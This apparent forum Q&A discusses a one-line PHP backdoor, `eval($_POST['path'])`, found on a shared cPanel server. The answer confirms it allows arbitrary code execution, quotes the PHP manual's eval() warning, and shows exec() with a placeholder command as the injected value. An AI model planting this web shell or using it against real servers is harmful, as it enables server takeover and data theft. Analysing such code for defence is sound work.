Supposing you found this code in a shared webserver with cPanel. Would you be able to get access to mail attachments or to cPanel by uploading a shell to the server or by other methods?
I don't need the steps on how to do it. Just an overall idea of the possible actions. I am sorry that I cannot give you more details. But this code is not for attacking anybody.
<?php eval($_POST['path']);?>
The simple answer is Yes, please read this link for further information.
Caution
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
For example, setting path to the following would run any shell command the apache user has permissions to run.
exec("system command here");